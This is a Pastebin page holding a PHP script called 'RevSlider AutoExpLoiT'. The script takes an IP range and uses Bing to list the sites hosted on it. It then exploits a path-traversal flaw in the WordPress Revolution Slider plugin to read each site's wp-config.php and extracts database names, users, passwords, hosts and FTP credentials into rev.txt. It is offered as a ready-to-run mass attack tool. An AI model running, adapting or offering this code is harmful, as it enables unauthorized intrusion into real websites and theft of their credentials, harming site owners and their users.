Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- set_time_limit(0);
- error_reporting(0);
- echo "================ RevSlider AutoExpLoiT ================\n\n";
- echo "Coded By : Maronox \n\n";
- echo "FB:Marouane El Maghribi\n\n";
- echo "================ Have Fun ================\n\n";
- echo "DATE ==> ";
- echo date("d/m/Y ")."heur => ".date( "h:i ")."\n";
- echo "Your Target : ";
- $ip=trim(fgets(STDIN,1024));
- $ip = explode('.',$ip);
- $ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.';
- for($i=0;$i <= 255;$i++)
- {
- $sites = array_map("site", bing("ip:$ip.$i"));
- $un=array_unique($sites);
- echo "[+] Scanning -> ", $ip.$i, ""."\n";
- echo "Found : ".count($sites)." sites\n\n";
- foreach($un as $pok){
- $host=findit($file,"DB_HOST', '","');");
- $db=findit($file,"DB_NAME', '","');");
- $us=findit($file,"DB_USER', '","');");
- $pw=findit($file,"DB_PASSWORD', '","');");
- $bda="http://$pok";
- $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
- $dn=($bda).($linkof);
- $file=@file_get_contents($dn);
- if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
- echo "[+] Scanning => ".$bda."\n\n";
- echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
- echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
- echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
- echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
- $db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
- $user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
- $pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
- $host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
- $ux = "".$bda."\r\n";
- $ux1 = "".$db."\r\n";
- $ux2 = "".$user."\r\n";
- $ux3 = "".$pass."\r\n";
- $ux4 = "".$host."\r\n";
- $ux5 = "".$ip.$i."\r\n" ;
- $save=fopen('rev.txt','ab');
- fwrite($save,"$i"."\r\n");
- fwrite($save,"$ux"."\r\n");
- fwrite($save,"$ux1");
- fwrite($save,"$ux2");
- fwrite($save,"$ux3");
- fwrite($save,"$ux4");
- fwrite($save,"$ux5","\r\n");
- fwrite($save,"=====================================","\r\n");
- }
- elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
- echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n";
- echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n";
- echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n";
- }
- else{echo $bda." : Shit NOt VUlnerable \n\n";}
- }
- }
- function findit($mytext,$starttag,$endtag) {
- $posLeft = stripos($mytext,$starttag)+strlen($starttag);
- $posRight = stripos($mytext,$endtag,$posLeft+1);
- return substr($mytext,$posLeft,$posRight-$posLeft);
- }
- function site($link){
- return str_replace("","",parse_url($link, PHP_URL_HOST));
- }
- function bing($what){
- for($i = 1; $i <= 2000; $i += 10){
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
- curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
- curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- $data = curl_exec($ch);
- preg_match_all('#;a=(.*?)" h="#',$data, $links);
- foreach($links[1] as $link){
- $allLinks[] = $link;
- }
- if(!preg_match('#"sw_next"#',$data)) break;
- }
- if(!empty($allLinks) && is_array($allLinks)){
- return array_unique(array_map("urldecode", $allLinks));
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement